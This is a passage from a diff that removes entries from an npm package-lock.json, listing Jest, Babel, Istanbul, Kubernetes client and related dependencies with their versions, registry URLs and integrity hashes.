"sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "requires": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "dependencies": { - "ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==" - }, - "ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==" - }, - "emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "requires": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - } - }, - "strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "requires": { - "ansi-regex": "^6.0.1" - } - }, - "wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "requires": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - } - } - } - }, - "@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "requires": { - "minipass": "^7.0.4" - } - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "dependencies": { - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - } - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - } - }, - "@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "requires": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - } - }, - "@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3" - } - }, - "@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - } - }, - "@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "requires": {} - }, - "@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "requires": {} - }, - "@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", - "requires": { - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "openid-client": "^6.1.3", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - } - }, - "@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.6", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", - "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.14", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", - "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "22.10.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.1.tgz", - "integrity": "sha512-qKgsUwfHZV2WCWLAnVP1JqnpE6Im6h3Y0+fYgMTasNQ7V++CBX5OT1as0g0f+OyubbFqhf6XVNIsmN4IIhEgGQ==", - "dev": true, - "requires": { - "undici-types": "~6.20.0" - } - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=" - }, - "async": { - "version": "3.2.6", - "resolved": "https://registry.npmjs.org/async/-/async-3.2.6.tgz", - "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==", - "dev": true - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" - }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=" - }, - "aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" - }, - "babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "requires": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "dependencies": { - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - } - } - }, - "babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": 